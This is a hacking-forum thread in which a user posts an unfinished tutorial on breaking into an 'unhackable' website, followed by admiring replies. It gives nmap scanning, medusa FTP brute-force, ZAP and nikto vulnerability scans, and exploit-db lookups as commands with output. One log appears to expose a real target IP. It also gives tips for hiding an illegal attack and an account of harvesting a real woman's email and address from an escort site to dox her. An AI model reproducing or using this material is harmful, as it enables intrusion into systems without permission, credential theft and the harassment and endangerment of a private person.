Poll: Did you like this post?
You do not have permission to vote in this poll.
OH YES!
57.14%
4 57.14%
OH HELL NO!
42.86%
3 42.86%
Total 7 vote(s) 100%
* You voted for this item. [Show Results]

Thread Contributor: Cylar[TUT] Hacking an unhackable Website. Professional Style
#1
Hacking Websites


[Image: logo-9-557aa147v1_site_icon.png]



Hello guys this is going to be a guide on how to scan and hack a website.

Im using ubuntu but you can use what ever linux distro you want.
And before we start you are going to be needing a few tools to get you start.
Also let me tell you what this tutorial is going to be about.
In this guide i will show you a massive but effective way of hacking a unhackable website.
Going threw not all but the best possible way to get a result.
Okay so what usally happens when you scan a website or what people tell me is oh i can't hack it.
Or i cannot find a website vulnerability. "Boo Whoo". Well look no further as i will go threw a lot of good ways.
Right here.




So who am i?
Just a regular guy just like you and had a huge passion for computers at a young age.
I tought myself programming and learn't as much as i could about computers. Also i'll make it quick on,
how to become a hacker for you. Basically hacking is about learning how things work. ???
WHAT!!!! yes. That's it hacking isn't just about hacking on computers. It happens in everyday live.
Here is an example.  A Lighter ciggerate lighter, Flame only goes 1 inch in height for e.g.
And people don't know or think it can go any higher than it is set at why?
Because they don't understand it's inner workings or how it was build.



Here is my example.
Lighter hack



So buy understanding how it works we can use it differently on how it was ment to be used.
Another example is the phone phreaker. He found out who to hack it by understanding how it was built.
He knew the phone operated by a nose going threw the operator. A tone say give access to call and the operator puts the call threw. So then he invented the blue box hack.

So there are my examples for you to learn from. So if we look at how websites are made?
Code plain and simple. So by learning about code we can learn how to attack a website for example.
XSS,SQL,RFI,LFI,CRLF, and so on. So learn from this information and you will become an amazing hacker.
This is the way you need to be thinking not only can you hack websites and computers but you can hack TV'S, CARS, anything is hackable.




  • + zaproxy
  • + nmap
  • + nikto
  • + fping
  • + oping
  • + theharvester
  • + hydra/mudusa




*NOTE you can install all these in linux by typing,  >sudo apt-get install nikto nmap fping oping<
And Downloading Zaproxy from github ill post that tut at the bottom.



Okay so the first step we need to do is find some information about the
Targeted website so if we begin by using ping.  Yes ultra skills right? Ignore me. But im dead serious.
Okay so first we use,



Ping <website>

*We aquire the website IP*

fping -b 50 -c 52 -H 40  <IPAddress>




*Leave run and press CTRL+C when finished see result. Check packet loss, See if it's functioning okay.

> sudo nmap -sSV -O <IPAddress> --packet-trace




*Packet trace isn't nessacery i just like to use to see the packets,
Aquire port numbers, One's we are looking for are port, 21, 19, 23, 80,

if your feeling brave you can use -T4 option. I wouldn't recommend, If you are
Doing this illegally. in fact i would setup proxychains, and run using that.
Might take longer yes but less risk. Also spoofing your mac, Using macchanger is always good.

* Using the -O option we can take a guess at the operating system here are my results.


PHP Code:
Device typegeneral purpose|storage-misc|firewall[/b][/align]
[
align=justify][b]Running (JUST GUESSING): Linux 2.6.X|3.X (90%), Synology DiskStation Manager 5.X (89%), WatchGuard Fireware 11.X (88%)[/b][/align]
[
align=justify][b]OS CPEcpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8[/b][/align]
[
align=justify][b]Aggressive OS guessesLinux 2.6.32 (90%), Linux 3.4 (89%), Synology DiskStation Manager 5.1 (89%), Linux 3.10 (88%), Linux 2.6.32 or 3.10 (88%), Linux 2.6.39 (88%), WatchGuard Fireware 11.8 (88%), Linux 3.1 3.2 (88%), Linux 2.6.32 2.6.39 (86%), Linux 3.5 (85%)[/b][/align]
[
align=justify][b]No exact OS matches for host (test conditions non-ideal).[/b][/align]

[
align=justify][b


They are not 100% accurate. Okay so my port results show the following

PHP Code:
[/b][/align]
[
align=justify][b]21/tcp    open   ftp      Pure-FTPd[/b][/align]
[
align=justify][b]22/tcp    open   ssh      OpenSSH 5.3 (protocol 2.0)[/b][/align]
[
align=justify][b]80/tcp    open   http     Apache httpd[/b][/align]
[
align=justify][b]443/tcp   open   ssl/http Apache httpd[/b][/align]

[
align=justify][b

Okay so we can see what services are available to us great Okay what i like to do is go for the FTP service straight up.

Now what you can do is setup crunch, And create your own password list.
Or you may download one from the internet. I allways run a default password list.
Just incase. Also note the OpenSSH 5.3 ( protocol 2.0 ) . Always copy and past this into google.
And look at exploit-db. See if anyone has developed an exploit for it.
Same goes for FTPd, And if you notice any other software versions.

Okay so lets get to it.

If we google the Pure-FTPd with exploit-db we find.

Sexy right?.

If we run the we could exploit and gain access then it's GG gameover. Okay BUT!. i don't have msfconsole setup,
on my ubuntu maybe if i do it later,
I'll exploit it this method. Sorry guys it's a real pain in the ass setting up.
But if you don't now how to add a ruby script to msf just google it.  And if you do then hat's off to you sir.

Medusa/Hydra.

Okay now we have our two services. FTP, SSH.
Lets try and hack these shall we.

Now it's complete preferance on which tool you wish to use.
I personally like using Hydra more but for this method ill be using medusa.

*NOTE, Most tutorials using bruteforce method's don't tell you about GPU usage.
Okay so if you have a decent GPU then your fine and if you have enough bandwidth, Along that then
You are also fine if not you will have to use threads. And slow it right down.
Also note that it is better using threads even with decent GPU, Bw, Because the service will block the incoming requests. It's like constantly retrying a password and then a forum says sorry try again in a few minutes

This sometimes and alot of times crashes the tool.  And most people will be panicky and think the tool isn't working.
This is why it's good learning programming for hacking so you no and understand what is going on.
Infact if you go full out and You thread to maxiumum you can actually end up dosing yourself.
So take it slow remember it's bruteforce takes a very long time. This brings me onto my next point is that.
I always go for option two.
Which will be website scanning but we will get into that later on.
Okay so medusa here we come.

Medusa is a great password cracking tool im using this, One because most people do not now how to use hydra properly and medusa well is alot easyer. Okay so lets get started.



*NOTE: Always note down information into a notepad, leafpad.
IPAddress, Ports, Information, Vulns, The more information in that notepad,leafpad the better.
Okay so we have our IPAddress and Ports, Lets get started. First if you haven't download a word-list.



I'll link you a default wordlist which ill be using in this guide.

Some really great username password lists.
*NOTE: Don't open in browser it will probably crash instead use wget.
And use the command wget <Address> and save it.

Okay so to run the bruteforce make sure your username password list is in the directory your attacking from.


sudo medusa -M ftp -f -e ns -r 5 -v 2  -h 00.00.00.000 -u admin -P 10k_most_common.txt


Were 0 is put your target IPAddress i blocked it for reasons.



PHP Code:
[/b][/align]

[
align=justify][b]Medusa v2.2_rc3 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>[/b][/align]

[align=justify][b]ERRORThread B3FFF700Host50.63.68.215 Cannot connect [unreachable], retrying (1 of 3 retries)[/b][/align]
[
align=justify][b]ERRORThread B3FFF700Host50.63.68.215 Cannot connect [unreachable], retrying (2 of 3 retries)[/b][/align]
[
align=justify][b]ERRORThread B3FFF700Host50.63.68.215 Cannot connect [unreachable], retrying (3 of 3 retries)[/b][/align]
[
align=justify][b]NOTICEftp.modfailed to connectport 21 was not open on 00.00.00.00[/b][/align]

[
align=justify][b




As you can see i got blocked. This happens but it's okay just wait an hour or so. And might be back up.
I either got blocked from the attack or it just happened to go down at that time.
I tried ssh but it went down aswell sorry about that. Okay this is why it's important to have a plan B.
Okay so our next step is website scanning. Okay so open zaproxy.

Okay there is two methods to this.  One is using the proxy or two using quick attack personally i prefer proxy.
So download the addon proxyfoxy and add a new proxy with localhost and port 8080.
This will be the zaproxy port. So visit your target website and switch to the zaproxy you just made in
Foxyproxy and refresh the page. Great now go back to your zaproxy.

Okay right click on the target website and click spidder.




[Image: OEh81pC.png]




Leave this run for about 10 - 20 minuites. Next step we need to start the active scan

As soon as the scan starts stop it. Now goto the policy button as shown



[Image: CvPpuJe.png]



Now change all these to high and either hard - insane. What this will do is by setting the first option to,
high will reduce the false positives. And setting the other option higher will increase the amount of attack tests.
Usally if your going for a quick scan you can leave them all at there default setting which is medium.

For best results now run the scan again and now just wait this could take an hour or more.
Now goto results and look for the red flags and check too see if there is any vulnerabilitys.
If there are that's great. Here are my results.

[IMG]

[IMG]

*NOTE you can also open this. And skip the tasks. Say if you just wanted an SQL scan, Or XSS.


[Image: 3jk9UAB.png]






TheHarvester



Okay, Now before we go exploit these vulnerabilities. We are going to do abit more rec
Theharvester is a great tool that can find emails threw meta data. Finding emails on a website is also good if your going to,
Do a dox for example if you used on hackforums.scrub and found a huge list of emails, And started doxing some punks.
Well im not going to make a tutorial on that as i will be here all week. Okay so emails are good for quite a lot of things.
You can use the against a company if you had contacts, You can also use emails to try and bruteforce there accounts.
Or if you trying to target a certain person on a website then again emails are your best bet.
If you wanted too you could hack the website Via sql injection and just hack that persons account. Without doing damage to,
The website that is if you could get away with it. Another thing you could do with emails is recon again and find out about that,
Person I.e family members, Socail media general dox stuff but with alot of dox information it's possible to try and reset there account. Usally if you have enough information on a facebook account or hotmail you can do this some services are harder.
Or there security system is different.

Okay so lets get to it. my target i decided to go for an escort website don't ask. But one reason is how poorly they are setup.
I know they hire mediocre web designers and some even just steal software. And put it all together for a few hundred pounds.



Run command.
python theHarvester.py -d website -b all -n -t -c



[Image: hYtNGsG.png]




Nice and easy. Like i said it's easy when you no what to target. Now a quick google search will tell me alot.





[Image: BVZjkJI.pnghttp:]




Yeah so if i wanted to i could gather alot of information about this person.
And turn it into a mass dox and just try and steal her emails and account information.  Could even prank call if i wanted get some, pizza's going you no the general stuff. Oh i even manage to find her address which is nice to now how safe you can be on the internet.
I guess today's security is to strong for me. Right so lets go check them results shall we. Oh wait what is this?




[Image: Ngv3jyC.png]






Damage is absolute critical holy sh*$, I haven't even finished the tutorial yet and already i have 3-5 methods of attack.
God damn i love security.  



Nikto

So as for our final step we will be using nikto. Just incase you didn't get any vulnerabilities you can try nikto.
I always use 5 different vulnerabilities scanners. Each target, And i use a bunch of other methods. But this is just.
To help you guy. Another thing is make sure you use a. Offshore VPN, You can also use proxychains aswell while using the tool.
But it can make it crash/stop. I use no404 option so it doesn't look for 404's but you can just scan it normal.

Command: sudo nikto -h <address> -no404



[Image: 0gf7wzM.png]





NOTE PLEASE IGNORE FOR NOW IM EDITING IT AS WE SPEAK!!!!!!!!!!!!!!!!


NOTE PLEASE IGNORE FOR NOW IM EDITING IT AS WE SPEAK!!!!!!!!!!!!!!!!
#2
Already very detailed. I'm curious how it will look when you're finished. Keep it up mate, I'm glad activity is rising.
Reply
#3
(09-05-2016, 08:23 AM)Bish0pQ Wrote: Already very detailed. I'm curious how it will look when you're finished. Keep it up mate, I'm glad activity is rising.

Thanks buddy. (y), I had to post it as my leafpad was maxing :rolleyes:
Still more information to be added i don't know if it will all fit haha.
Reply
#4
(09-05-2016, 08:33 AM)Cylar Wrote:
(09-05-2016, 08:23 AM)Bish0pQ Wrote: Already very detailed. I'm curious how it will look when you're finished. Keep it up mate, I'm glad activity is rising.

Thanks buddy. (y), I had to post it as my leafpad was maxing :rolleyes:
Still more information to be added i don't know if it will all fit haha.

Split it up in parts Wink Will give you a better overview and also others. Looks great BTW
Reply
#5
Very nice, Cylar.

I like the way you delivered. You keep it intriguing, with some personality, and I was definitely engaged throughout. I got stuck and read it all, from top to bottom.

Though, I would suggest creating multiple threads on the different tools/methods, that way there's less to go through, things are organized, and you get more of a thread count Wink,
which isn't really abusing policy because there's enough information under each section here, for you to post as individual threads with decent info.

A brilliant contribution, thank you, and I look forward to seeing more from you. Hat Tip

Edit: I'm not sure if the poll is a joke they're pulling on you, or if I'm the one reading something wrong - but that's just disgusting... keep doing you.
Reply
#6
Nice In depth guide.

I've used all tools mentioned, and they're proven to provide some pretty good results. On the topic of phone phreaking, Kevin Mitnick was renowned In that capacity (as well as a master social engineer), who manipulated the telephone system and performed some really cool hacks- one of which was turning landlines Into pay phones, whereby every time the given person made an out going call from his/her home phone, an automated voice would say "please deposit 25 cents...".

Nice contribution, thanks.
Reply
#7
What a fantastic thread, not going to lie this has made me want to get Linux so badly! Great tutorial, really impressed!
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)